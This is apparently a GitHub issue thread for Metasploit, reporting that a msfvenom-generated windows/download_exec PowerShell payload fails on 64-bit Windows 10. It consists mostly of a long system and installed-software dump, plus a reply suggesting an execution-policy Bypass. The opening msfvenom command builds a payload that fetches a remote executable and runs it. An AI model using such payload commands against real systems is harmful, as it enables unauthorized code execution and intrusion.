msfvenom -p windows/download_exec not working on 64bit / WOW64

[klikevil]

Steps to reproduce

How'd you do it?

1. ./msfvenom -p windows/download_exec --platform windows -a x86 -e cmd/powershell_base64 -f psh EXITFUNC=thread EXE='calc.exe' URL=https://yourserver/notepad.exe VERBOSE=true --out what-dle.ps1

2. Run outputted powershell script

Expected behavior

Download and execute of payload

Current behavior

Does not even download, leaves an error in event viewer (could potentially be related to .net framework?)

Application: powershell.exe Framework Version: v4.0.30319 Description: The process was terminated due to an unhandled exception. Exception Info: exception code c000001d, exception address 000002B75AA20006

System stuff

Metasploit version

$ git log -1 --pretty=oneline 7b7f56ec0449636deb96874415e1586b5f1e24fc (HEAD -> master, origin/master, origin/HEAD) automatic module_metadata_base.json update

I installed Metasploit with:

Installed in WSL with kali as distro

• [ ] Source install (please specify ruby version) $ ruby -v ruby 2.5.7p206 (2019-10-01 revision 67816) [x86_64-linux-gnu]

OS

What OS are you running Metasploit on?

Target payload: windows 10 (x64) Payload generated under: WSL kali

We have symantec endpoint protection on as well, but the directory the payload is saved in is completely whitelisted.

Environment:

OS Information

OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Original Install Date:     4/22/2019, 9:47:53 AM
System Boot Time:          1/22/2020, 1:49:06 AM
System Manufacturer:       Dell Inc.
System Model:              Latitude 7490
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 142 Stepping 10 GenuineIntel ~1910 Mhz
BIOS Version:              Dell Inc. 1.7.2, 11/26/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     16,259 MB
Available Physical Memory: 8,027 MB
Virtual Memory: Max Size:  29,571 MB
Virtual Memory: Available: 16,284 MB
Virtual Memory: In Use:    13,287 MB
Page File Location(s):     C:\pagefile.sys
Hotfix(s):                 14 Hotfix(s) Installed.
                           [01]: KB2693643
                           [02]: KB4532936
                           [03]: KB4456655
                           [04]: KB4465663
                           [05]: KB4486153
                           [06]: KB4494451
                           [07]: KB4497398
                           [08]: KB4509094
                           [09]: KB4512576
                           [10]: KB4516115
                           [11]: KB4521861
                           [12]: KB4523203
                           [13]: KB4530741
                           [14]: KB4530717
Network Card(s):           13 NIC(s) Installed.
                           [01]: Intel(R) Dual Band Wireless-AC 8265
                                 Connection Name: Wi-Fi
                                 DHCP Enabled:    Yes
                                 DHCP Server:     N/A
                                 IP address(es)
                           [02]: Intel(R) Ethernet Connection (4) I219-LM
                                 Connection Name: Ethernet
                                 Status:          Media disconnected
                           [03]: Bluetooth Device (Personal Area Network)
                                 Connection Name: Bluetooth Network Connection
                                 Status:          Media disconnected
                           [04]: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
                                 Connection Name: Ethernet 2
                                 Status:          Hardware not present
                           [05]: VirtualBox Host-Only Ethernet Adapter
                                 Connection Name: VirtualBox Host-Only Network
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.56.1
                           [06]: Hyper-V Virtual Ethernet Adapter
                                 Connection Name: vEthernet (Default Switch)
                                 DHCP Enabled:    Yes
                                 DHCP Server:     255.255.255.255
                                 IP address(es)
                                 [01]: 172.18.100.209
                           [07]: Hyper-V Virtual Ethernet Adapter
                                 Connection Name: vEthernet (Bridgey)
                                 Status:          Media disconnected
                           [08]: Hyper-V Virtual Ethernet Adapter
                                 Connection Name: vEthernet (CorpBridgey)
                                 Status:          Media disconnected
                           [09]: Fortinet Virtual Ethernet Adapter (NDIS 6.30)
                                 Connection Name: Ethernet 5
                                 Status:          Media disconnected
                           [10]: Fortinet SSL VPN Virtual Ethernet Adapter
                                 Connection Name: Ethernet 6
                                 Status:          Hardware not present
                           [11]: Array Networks SSL VPN Adapter
                                 Connection Name: Ethernet 7
                                 Status:          Hardware not present
                           [12]: Microsoft Network Adapter Multiplexor Driver
                                 Connection Name: Network Bridge
                                 DHCP Enabled:    Yes
                                 DHCP Server:     N/A
                                 IP address(es)
                           [13]: Hyper-V Virtual Ethernet Adapter
                                 Connection Name: vEthernet (WifiBridge)
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.2.254
                                 IP address(es)
                                 [01]: 192.168.2.3
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

.NET framework information

CBS : 1 Install : 1 InstallPath : C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ Release : 528049 Servicing : 0 TargetVersion : 4.0.0 Version : 4.8.03761 PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4 PSChildName : Full PSDrive : HKLM PSProvider

Installed software

Installed software list

DisplayName : 7-Zip 18.05 (x64) Version : 18.05 InstallDate : Publisher : Igor Pavlov UninstallString : C:\Program Files\7-Zip\Uninstall.exe InstallLocation : C:\Program Files\7-Zip\ InstallSource : HelpLink : EstimatedSizeMB : 4.93 DisplayName : MotionPro Version : 9.4.0.0 InstallDate : Publisher : Array Networks UninstallString : C:\Program Files\Array Networks\MotionPro VPN Client\uninst.exe InstallLocation : InstallSource : HelpLink : EstimatedSizeMB : 0 DisplayName : Mozilla Firefox 72.0.1 (x64 en-US) Version : 72.0.1 InstallDate : Publisher : Mozilla UninstallString : "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" InstallLocation : C:\Program Files\Mozilla Firefox InstallSource : HelpLink : https://support.mozilla.org EstimatedSizeMB : 363.52 DisplayName : Mozilla Maintenance Service Version : 72.0.1 InstallDate : Publisher : Mozilla UninstallString : "C:\Program Files (x86)\Mozilla Maintenance Service\uninstall.exe" InstallLocation : InstallSource : HelpLink : EstimatedSizeMB : 0.56 DisplayName : Notepad++ (64-bit x64) Version : 7.8.2 InstallDate : Publisher : Notepad++ Team UninstallString : C:\Program Files\Notepad++\uninstall.exe InstallLocation : InstallSource : HelpLink : EstimatedSizeMB : 10.38 DisplayName : Microsoft Office 365 ProPlus - en-us Version : 16.0.12325.20288 InstallDate : Publisher : Microsoft Corporation UninstallString : "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" scenario=install scenariosubtype=ARP sourcetype=None productstoremove=O365ProPlusRetail.16_en-us_x-none culture=en-us version.16=16.0 InstallLocation : C:\Program Files\Microsoft Office InstallSource : HelpLink : EstimatedSizeMB : 0 DisplayName : SDCC Version : InstallDate : Publisher : sdcc.sourceforge.net UninstallString : C:\Program Files\SDCC\uninstall.exe InstallLocation : C:\Program Files\SDCC InstallSource : HelpLink : http://sdcc.sourceforge.net/ EstimatedSizeMB : 0 DisplayName : Realtek USB Audio Version : 6.3.9600.132 InstallDate : Publisher : Realtek Semiconductor Corp. UninstallString : C:\Windows\system32\rundll32.exe RtSetupAPI64.dll RealtekUSBAudioInstaller -r -m InstallLocation : C:\Program Files\Realtek\Audio\USB InstallSource : HelpLink : EstimatedSizeMB : 0 DisplayName : AgentInstall-x64_15_5 Version : 15.5.0107.01001 InstallDate : 12/6/2019 12:00:00 AM Publisher : Symantec Corp. UninstallString : MsiExec.exe /X{11012518-A235-4178-8041-ACA48E052C60} InstallLocation : C:\Program Files\Manufacturer\Endpoint Agent\ InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{04BFF634-231F-4FC3-8EA5-D54AFA45741B}\cache\ HelpLink : EstimatedSizeMB : 308.15 DisplayName : 7-Zip 19.00 (x64 edition) Version : 19.00.00.0 InstallDate : 5/20/2019 12:00:00 AM Publisher : Igor Pavlov UninstallString : MsiExec.exe /I{23170F69-40C1-2702-1900-000001000000} InstallLocation : InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{B3B76409-5860-5ACA-DF6B-FE57C3BD0954}\cache\ HelpLink : http://www.7-zip.org/support.html EstimatedSizeMB : 5.13 DisplayName : Symantec Endpoint Protection Version : 14.0.3929.1200 InstallDate : 12/19/2019 12:00:00 AM Publisher : Symantec Corporation UninstallString : MsiExec.exe /I{2B448775-6A9D-4594-A59F-5F3076B67309} InstallLocation : C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\14.0.3929.1200.105\ InstallSource : C:\Windows\Temp\6cabeb3f-2a90-4ffe-b26d-6e1e3b75fa57\ HelpLink : EstimatedSizeMB : 580.4 DisplayName : Maxx Audio Installer (x64) Version : 2.7.9326.0 InstallDate : 4/22/2019 12:00:00 AM Publisher : Waves Audio Ltd. UninstallString : MsiExec.exe /X{307032B2-6AF2-46D7-B933-62438DEB2B9A} InstallLocation : c:\Program Files\Waves\MaxxAudio\ InstallSource : c:\drivers\x64\audio\88ccc_a00-00\hdaudio\ HelpLink : EstimatedSizeMB : 108.75 DisplayName : Software Management Solution Plugin Version : 8.5.3627.0 InstallDate : 4/22/2019 12:00:00 AM Publisher : Altiris Inc. UninstallString : MsiExec.exe /I{48541466-9F58-4627-8D41-036BF19BEDC9} InstallLocation : C:\Program Files\Altiris\Altiris Agent\Agents\Software Management Solution Plugin\ InstallSource : C:\WINDOWS\SETUP\SCRIPTS\ HelpLink : EstimatedSizeMB : 1.05 DisplayName : Deployment Solution Agent Version : 8.5.3663.0 InstallDate : 4/22/2019 12:00:00 AM Publisher : Symantec UninstallString : MsiExec.exe /I{493B986D-AD15-45DA-918B-CD0947307DAB} InstallLocation : C:\Program Files\Altiris\Altiris Agent\Agents\Deployment\ InstallSource : C:\WINDOWS\SETUP\SCRIPTS\ HelpLink : support@altiris.com EstimatedSizeMB : 3.52 DisplayName : Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Version : 9.0.30729.6161 InstallDate : 4/22/2019 12:00:00 AM Publisher : Microsoft Corporation UninstallString : MsiExec.exe /X{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4} InstallLocation : InstallSource : c:\aa78abb0d9d3bd34685a6c\ HelpLink : EstimatedSizeMB : 13.21 DisplayName : Symantec Endpoint Encryption Client Version : 11.2.0 MP1 InstallDate : 4/22/2019 12:00:00 AM Publisher : Symantec Corporation UninstallString : MsiExec.exe /X{7B5C708A-E3A9-40F0-8ABE-97EC534B98BF} InstallLocation : InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{A8B9CB7A-BE8E-4A59-86BE-C0BB27645A86}\cache\ HelpLink : www.symantec.com/bussiness/support/ EstimatedSizeMB : 121.52 DisplayName : FortiClient VPN Version : 6.2.1.0831 InstallDate : 8/29/2019 12:00:00 AM Publisher : Fortinet Technologies Inc UninstallString : MsiExec.exe /X{8C9E2A28-ED82-4192-8CC0-1BF2BB379435} InstallLocation : C:\Program Files\Fortinet\FortiClient\ InstallSource : C:\ProgramData\Applications\Cache\{8C9E2A28-ED82-4192-8CC0-1BF2BB379435}\6.2.1.0831\ HelpLink : EstimatedSizeMB : 195.5 DisplayName : Office 16 Click-to-Run Licensing Component Version : 16.0.12325.20280 InstallDate : 1/22/2020 12:00:00 AM Publisher : Microsoft Corporation UninstallString : MsiExec.exe /I{90160000-007E-0000-1000-0000000FF1CE} InstallLocation : InstallSource : c:\program files\microsoft office\root\integration\ HelpLink : EstimatedSizeMB : 4.81 DisplayName : Office 16 Click-to-Run Extensibility Component Version : 16.0.12325.20288 InstallDate : 1/22/2020 12:00:00 AM Publisher : Microsoft Corporation UninstallString : MsiExec.exe /X{90160000-008C-0000-1000-0000000FF1CE} InstallLocation : InstallSource : c:\program files\microsoft office\root\integration\ HelpLink : EstimatedSizeMB : 30.95 DisplayName : Office 16 Click-to-Run Localization Component Version : 16.0.12325.20288 InstallDate : 1/22/2020 12:00:00 AM Publisher : Microsoft Corporation UninstallString : MsiExec.exe /X{90160000-008C-0409-1000-0000000FF1CE} InstallLocation : InstallSource : c:\program files\microsoft office\root\integration\ HelpLink : EstimatedSizeMB : 0.05 DisplayName : Altiris Application Metering Agent Version : 8.5.3687.0 InstallDate : 4/23/2019 12:00:00 AM Publisher : Symantec Corporation UninstallString : MsiExec.exe /I{91EBE1C2-0AC6-42A9-A5B7-21430EFD905A} InstallLocation : C:\Program Files\Altiris\Altiris Agent\Agents\Application Metering Agent\ InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{9A125D17-657E-460D-A897-5E96E0BFBAC1}\cache\ HelpLink : http://http://www.altiris.com/support/ EstimatedSizeMB : 1.92 DisplayName : Dell Touchpad Version : 10.3201.101.108 InstallDate : Publisher : ALPS ELECTRIC CO., LTD. UninstallString : C:\Program Files\DellTPad\Uninstap.exe ADDREMOVE InstallLocation : C:\Program Files\DellTPad InstallSource : HelpLink : EstimatedSizeMB : 0 DisplayName : IBSA Version : 4.5.110 InstallDate : 8/28/2019 12:00:00 AM Publisher : Phantom UninstallString : MsiExec.exe /X{AE4231FD-C6BB-4B19-AE83-276E47C145B2} InstallLocation : C:\Program Files\Phantom\IBSA\ InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{5923EC37-DFC7-4CE6-81E4-784D2DCD9228}\cache\ HelpLink : EstimatedSizeMB : 12.32 DisplayName : Google Chrome Version : 79.0.3945.117 InstallDate : 1/10/2020 12:00:00 AM Publisher : Google LLC UninstallString : MsiExec.exe /X{B0ADCD48-32BE-3E01-89F3-CA3224594A8B} InstallLocation : InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{B526089E-F45D-6FFF-60B4-9528E26F3422}\cache\ HelpLink : EstimatedSizeMB : 58.08 DisplayName : Oracle VM VirtualBox 6.1.0 Version : 6.1.0 InstallDate : 12/19/2019 12:00:00 AM Publisher : Oracle Corporation UninstallString : MsiExec.exe /I{B9B53CFE-C4E3-47FB-9BC0-8022F0AB6814} InstallLocation : InstallSource : C:\Windows\TEMP\VirtualBox\ HelpLink : EstimatedSizeMB : 216.22 DisplayName : Altiris Inventory Agent Version : 8.5.3687.0 InstallDate : 5/20/2019 12:00:00 AM Publisher : Symantec Corporation UninstallString : MsiExec.exe /I{B9C8C6C5-8EE0-4196-96E7-118F563EA40B} InstallLocation : C:\Program Files\Altiris\Altiris Agent\ InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{5864027D-DA99-4430-9183-4EFF8B362383}\cache\ HelpLink : http://www.altiris.com EstimatedSizeMB : 7.14 DisplayName : Local Administrator Password Solution Version : 6.2.0.0 InstallDate : 10/7/2019 12:00:00 AM Publisher : Microsoft Corporation UninstallString : MsiExec.exe /I{EA8CB806-C109-4700-96B4-F1F268E5036C} InstallLocation : InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{53E69F29-564A-4BAE-B82F-BAA13781F72A}\cache\Files\ HelpLink : EstimatedSizeMB : 0.13 DisplayName : Patch Management Agent Version : 8.5.3622.0 InstallDate : 4/22/2019 12:00:00 AM Publisher : Symantec UninstallString : MsiExec.exe /I{F107B84C-B72A-4C2A-90EE-796948012F3E} InstallLocation : C:\Program Files\Altiris\Altiris Agent\Agents\PatchMgmtAgent\ InstallSource : C:\WINDOWS\SETUP\SCRIPTS\ HelpLink : http://symantec.com/business/support EstimatedSizeMB : 5.29 DisplayName : Cisco AnyConnect Secure Mobility Client Version : 4.4.03034 InstallDate : Publisher : Cisco Systems, Inc. UninstallString : C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\Uninstall.exe -remove InstallLocation : InstallSource : HelpLink : http://www.cisco.com/TAC/ EstimatedSizeMB : 5.86 DisplayName : SDCC Version : InstallDate : Publisher : sdcc.sourceforge.net UninstallString : C:\Program Files (x86)\SDCC\uninstall.exe InstallLocation : C:\Program Files (x86)\SDCC InstallSource : HelpLink : http://sdcc.sourceforge.net/ EstimatedSizeMB : 0 DisplayName : VLC media player Version : 3.0.8 InstallDate : Publisher : VideoLAN UninstallString : "C:\Program Files (x86)\VideoLAN\VLC\uninstall.exe" InstallLocation : C:\Program Files (x86)\VideoLAN\VLC InstallSource : HelpLink : EstimatedSizeMB : 0 DisplayName : Realtek Audio COM Components Version : 1.0.2 InstallDate : 4/22/2019 12:00:00 AM Publisher : Realtek Semiconductor Corp. UninstallString : MsiExec.exe /I{2355B503-9B11-4449-861D-1C1748B26320} InstallLocation : InstallSource : C:\Program Files\Realtek\Audio\HDA\ HelpLink : EstimatedSizeMB : 0.58 DisplayName : Java 8 Update 201 Version : 8.0.2010.9 InstallDate : 4/22/2019 12:00:00 AM Publisher : Oracle Corporation UninstallString : MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F32180201F0} InstallLocation : C:\Program Files (x86)\Java\jre1.8.0_201\ InstallSource : C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Oracle\Java\jre1.8.0_201\ HelpLink : https://java.com/help EstimatedSizeMB : 102.32 DisplayName : Java 8 Update 231 Version : 8.0.2310.11 InstallDate : 11/14/2019 12:00:00 AM Publisher : Oracle Corporation UninstallString : MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F32180231F0} InstallLocation : C:\Program Files (x86)\Java\jre1.8.0_231\ InstallSource : C:\Users\period\AppData\LocalLow\Oracle\Java\jre1.8.0_231\ HelpLink : https://java.com/help EstimatedSizeMB : 35.88 DisplayName : Adobe Shockwave Player 12.3 Version : 12.3.5.205 InstallDate : 5/30/2019 12:00:00 AM Publisher : Adobe, Inc UninstallString : MsiExec.exe /X{4487064C-F31E-4499-A1EF-9B8E809A0358} InstallLocation : C:\Windows\SysWOW64\Adobe\ InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{200158F2-B292-0460-AFBF-5A2723AFFC23}\cache\ HelpLink : http://www.adobe.com/support/shockwave EstimatedSizeMB : 52.4 DisplayName : Java Auto Updater Version : 2.8.231.11 InstallDate : 11/14/2019 12:00:00 AM Publisher : Oracle Corporation UninstallString : InstallLocation : InstallSource : C:\Users\period\AppData\LocalLow\Oracle\Java\jre1.8.0_231\ HelpLink : EstimatedSizeMB : 1.93 DisplayName : XCP-ng Center 7.6.0 Version : 7.6.0.9 InstallDate : 9/30/2019 12:00:00 AM Publisher : XCP-ng UninstallString : MsiExec.exe /X{4C738D9E-4BB1-4CD6-95A6-8DC803E85241} InstallLocation : HelpLink : EstimatedSizeMB : 22.86 DisplayName : Citrix XenCenter Version : 6.1.3 InstallDate : 9/30/2019 12:00:00 AM Publisher : Citrix Systems, Inc. UninstallString : MsiExec.exe /X{5800A2A9-0DBF-4F46-9B7B-CCA602BDE6A1} InstallLocation : HelpLink : EstimatedSizeMB : 63.33 DisplayName : VIP Access Version : 2.2.4.44 InstallDate : 4/22/2019 12:00:00 AM Publisher : Symantec Corporation UninstallString : MsiExec.exe /X{58594A65-ACD7-41A2-B6ED-2597777F2850} InstallLocation : C:\Program Files (x86)\Symantec\VIP Access Client\ InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{7B008651-73C9-4979-840A-04670CF32FFA}\cache\Files\VIPAccess_Installer\ HelpLink : EstimatedSizeMB : 11.64 DisplayName : Realtek Card Reader Version : 10.0.15063.21300 InstallDate : Publisher : Realtek Semiconductor Corp. UninstallString : C:\Windows\RtCRU64.exe /u InstallLocation : InstallSource : HelpLink : EstimatedSizeMB : 14.65 DisplayName : Google Update Helper Version : 1.3.35.341 InstallDate : 12/6/2019 12:00:00 AM Publisher : Google LLC UninstallString : MsiExec.exe /I{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} InstallLocation : InstallSource : C:\Program Files (x86)\Google\Update\1.3.35.341\ HelpLink : EstimatedSizeMB : 0.04 DisplayName : MirrorOp Version : 2.0.0.23 InstallDate : 5/20/2019 12:00:00 AM Publisher : AWIND Inc UninstallString : MsiExec.exe /X{6edc8ea3-5cba-4942-8313-540b6ea7571e} InstallLocation : C:\Program Files (x86)\MirrorOp\ InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{CF0426B7-2C7F-4828-ADE4-A5ED9B027DC3}\cache\ HelpLink : EstimatedSizeMB : 30.2 DisplayName : Teams Machine-Wide Installer Version : 1.2.0.19260 InstallDate : 8/29/2019 12:00:00 AM Publisher : Microsoft Corporation UninstallString : MsiExec.exe /I{731F6BAA-A986-45A4-8936-7C3AAAAA760B} InstallLocation : InstallSource : C:\Program Files\Microsoft Office\root\integration\Addons\ HelpLink : EstimatedSizeMB : 90.39 DisplayName : Cisco AnyConnect ISE Posture Module Version : 4.4.03034 InstallDate : 4/22/2019 12:00:00 AM Publisher : Cisco Systems, Inc. UninstallString : MsiExec.exe /X{9317038A-8547-41F1-B8EA-154CFF895610} InstallLocation : C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\ InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{AFC6812E-CD0E-4BCB-991D-C2D20924EB6D}\cache\ HelpLink : http://www.cisco.com/TAC/ EstimatedSizeMB : 1.94 DisplayName : Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Version : 9.0.30729.6161 InstallDate : 4/22/2019 12:00:00 AM Publisher : Microsoft Corporation UninstallString : MsiExec.exe /X{9BE518E6-ECC6-35A9-88E4-87755C07200F} InstallLocation : InstallSource : c:\01dd7fa27055585cb016\ HelpLink : EstimatedSizeMB : 10.2 DisplayName : Cisco AnyConnect ISE Compliance Module Version : 3.6.11098.2 InstallDate : 7/8/2019 12:00:00 AM Publisher : Cisco Systems, Inc UninstallString : MsiExec.exe /I{A390D36F-3DA8-4581-9887-04905A71044C} InstallLocation : C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\opswat\ InstallSource : C:\Windows\TEMP\install\A71044C\ HelpLink : http://www.cisco.com/TAC/ EstimatedSizeMB : 13.76 DisplayName : Adobe Refresh Manager Version : 1.8.0 InstallDate : 10/17/2019 12:00:00 AM Publisher : Adobe Systems Incorporated UninstallString : MsiExec.exe /I{AC76BA86-0804-1033-1959-000182435289} InstallLocation : C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\ InstallSource : C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\Cache\ HelpLink : http://www.adobe.com/support/main.html EstimatedSizeMB : 1.66 DisplayName : Adobe Acrobat Reader DC Version : 19.021.20061 InstallDate : 12/20/2019 12:00:00 AM Publisher : Adobe Systems Incorporated UninstallString : MsiExec.exe /I{AC76BA86-7AD7-1033-7B44-AC0F074E4100} InstallLocation : C:\Program Files (x86)\Adobe\Acrobat Reader DC\ InstallSource : C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\ HelpLink : http://www.adobe.com/support/main.html EstimatedSizeMB : 307.08 DisplayName : Cisco Jabber Version : 12.6.1.34405 InstallDate : 10/24/2019 12:00:00 AM Publisher : Cisco Systems, Inc UninstallString : MsiExec.exe /X{B87384BE-C083-43F9-9E16-1C2B7380FB2E} InstallLocation : C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{01286FD0-05D3-4F07-8E64-97845BA9F9E5}\cache\Files\ HelpLink : EstimatedSizeMB : 400.14 DisplayName : Cisco AnyConnect Secure Mobility Client Version : 4.4.03034 InstallDate : 4/22/2019 12:00:00 AM Publisher : Cisco Systems, Inc. UninstallString : MsiExec.exe /X{EB629A98-5E69-40E8-BA9E-C393899F959D} InstallLocation : C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\ InstallSource : C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\Software Delivery\{0AA4A901-0D66-4D55-B292-3B544F40A5BB}\cache\ HelpLink : http://www.cisco.com/TAC/ EstimatedSizeMB : 16.02 DisplayName : Ant Video downloader (Native messaging host) Version : 4.3 InstallDate : 11/27/2019 12:00:00 AM Publisher : Ant.com UninstallString : MsiExec.exe /X{EF61BF45-53FF-41A8-96C9-0527735FE8CE} InstallLocation : HelpLink : http://support.ant.com/ EstimatedSizeMB : 36.51 DisplayName : Intel(R) Processor Graphics Version : 24.20.100.6286 InstallDate : Publisher : Intel Corporation UninstallString : "C:\Program Files (x86)\Intel\Intel(R) Processor Graphics\Uninstall\igxpin.exe" -uninstall InstallLocation : C:\Program Files (x86)\Intel\Intel(R) Processor Graphics InstallSource : HelpLink : EstimatedSizeMB : 74.22 DisplayName : Realtek High Definition Audio Driver Version : 6.0.1.8555 InstallDate : Publisher : Realtek Semiconductor Corp. UninstallString : C:\Program Files\Realtek\Audio\HDA\RtlUpd64.exe -r -m -nrg2709 InstallLocation : C:\Program Files\Realtek\Audio\HDA InstallSource : HelpLink : EstimatedSizeMB : 0

[klikevil]

Side note:

psh-reflection doesn't seem to work either nor psh-cmd.

psh-reflection leaves the following message in event viewer:

Windows cannot access the file for one of the following reasons: there is a problem with the network connection, the disk that the file is stored on, or the storage drivers installed on this computer; or the disk is missing. Windows closed the program Windows PowerShell because of this error.

Program: Windows PowerShell File:

The error value is listed in the Additional Data section. User Action

1. Open the file again. This situation might be a temporary problem that corrects itself when the program runs again.
2. If the file still cannot be accessed and
   • It is on the network, your network administrator should verify that there is not a problem with the network and that the server can be contacted.
   • It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
4. If the problem persists, restore the file from a backup copy.
5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for further assistance.

Additional Data Error value: 00000000 Disk type: 0

[okoibraun]

Try to see if you can set your systems powershell execution policy as follows:

1. Goto to command prompt and type "powershell" w/o the surrounding quotes

You should then get the prompt displaying PS>

2. Type Get-ExecutionPolicy

If it returns restricted, then continue with step 3, else if not restricted it simply means you're good

3. Type Set-ExecutionPolicy AllSigned or Set-ExecutionPolicy ByPass

Then rerun you commands

On Wed, Jan 22, 2020, 11:49 PM period notifications@github.com wrote:

Side note:

psh-reflection doesn't seem to work either nor psh-cmd.

psh-reflection leaves the following message in event viewer:

Windows cannot access the file for one of the following reasons: there is a problem with the network connection, the disk that the file is stored on, or the storage drivers installed on this computer; or the disk is missing. Windows closed the program Windows PowerShell because of this error.

Program: Windows PowerShell File:

The error value is listed in the Additional Data section. User Action

1. Open the file again. This situation might be a temporary problem that corrects itself when the program runs again.
2. If the file still cannot be accessed and
   • It is on the network, your network administrator should verify that there is not a problem with the network and that the server can be contacted.
   • It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
4. If the problem persists, restore the file from a backup copy.
5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for further assistance.

Additional Data Error value: 00000000 Disk type: 0

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/12876?email_source=notifications&email_token=AN47WYZ3HW27QEUIWJQWALLQ7DEORA5CNFSM4KKNERD2YY3PNVWWK3TUL52HS4DFVREXG43VMVBW63LNMVXHJKTDN5WW2ZLOORPWSZGOEJVMHXY#issuecomment-577422303, or unsubscribe https://github.com/notifications/unsubscribe-auth/AN47WY3N2C33HJ5M5FTM74LQ7DEORANCNFSM4KKNERDQ .

[klikevil]

Try to see if you can set your systems powershell execution policy as follows: 1. Goto to command prompt and type "powershell" w/o the surrounding quotes You should then get the prompt displaying PS> 2. Type Get-ExecutionPolicy If it returns restricted, then continue with step 3, else if not restricted it simply means you're good 3. Type Set-ExecutionPolicy AllSigned or Set-ExecutionPolicy ByPass Then rerun you commands … On Wed, Jan 22, 2020, 11:49 PM period @.***> wrote: Side note: psh-reflection doesn't seem to work either nor psh-cmd. psh-reflection leaves the following message in event viewer: Windows cannot access the file for one of the following reasons: there is a problem with the network connection, the disk that the file is stored on, or the storage drivers installed on this computer; or the disk is missing. Windows closed the program Windows PowerShell because of this error. Program: Windows PowerShell File: The error value is listed in the Additional Data section. User Action 1. Open the file again. This situation might be a temporary problem that corrects itself when the program runs again. 2. If the file still cannot be accessed and - It is on the network, your network administrator should verify that there is not a problem with the network and that the server can be contacted. - It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer. 3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER. 4. If the problem persists, restore the file from a backup copy. 5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for further assistance. Additional Data Error value: 00000000 Disk type: 0 — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#12876?email_source=notifications&email_token=AN47WYZ3HW27QEUIWJQWALLQ7DEORA5CNFSM4KKNERD2YY3PNVWWK3TUL52HS4DFVREXG43VMVBW63LNMVXHJKTDN5WW2ZLOORPWSZGOEJVMHXY#issuecomment-577422303>, or unsubscribe 